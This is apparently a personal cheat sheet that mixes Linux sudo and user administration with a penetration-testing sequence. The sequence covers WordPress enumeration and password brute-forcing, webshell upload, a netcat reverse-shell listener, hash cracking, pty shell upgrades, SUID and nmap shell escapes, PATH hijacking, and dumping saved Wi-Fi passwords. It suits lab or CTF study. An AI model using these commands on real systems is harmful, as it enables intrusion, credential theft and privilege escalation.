users

#users
passwd
sudo passwd <user>
sudo passwd <user> -d
sudo adduser <user>
sudo visudo
<user> ALL=(ALL:ALL) ALL
<user>   ALL = NOPASSWD: ALL
update-alternatives --set editor /usr/bin/vim

sudo userdel -r <user>

/etc/sudoers usermod visudo

windows:
netsh wlan show profiles
netsh wlan show profile <ssid>

vim to clipboard:
V
:w !pbcopy
:%w !pbcopy

pentest:
install uniscan
uniscan -h
uniscan -u <url/> -qweds
wget ...
file <name>

wc -w
sort -u > file.txt

wordpress

update:
cd wpscan

ruby wpscan.rb --update
find . -type f -name 'wpscan.rb'
wpscan --help

plugins
ruby wpscan.rb --url http://yourwebsite.com --enumerate vp
themes
ruby wpscan.rb --url http://yourwebsite.com --enumerate vt
users
ruby wpscan.rb --url http://yourwebsite.com --enumerate u --proxy_host <ip> --proxy_port port

ruby wpscan.rb --url http://yourwebsite.com --wordlist passwords.txt threads 50 --username <>

webshells
apt install webshells
update ip and add port
wp theme update php

nc -lvnp <port>

find users:
cd /etc
cat passwd

cd /home/<user>

hash-identifier
apt install hash-identifier
hash-identifier <hash>

hashcat
apt install hashcat

hashcat -a 0 -m 0 <hash file> <wordlist file>

python -c 'import pty; pty.spawn("/bin/sh")'

su <name>
password:

set of user id with perm 4000
find / -user <name> -perm -4000

nmap --interactive
!sh

netdiscover
apt install netdiscover

echo 2323 | base64 --decode

nikto
apt install nikto
nikto -host <ip> -useproxy <ip>

cewl password from website
apt install cewl
cewl --proxy_host <ip> --proxy_port port url -w filename

burp suite

dirb webscanner
apt install dirb

ftp

open <ip> <port>
mget

strings - search binary file for strings

echo $PATH
export PATH=/<>:.....

echo '/bin/bash' > /tmp/cat
chmod +x /tmp/cat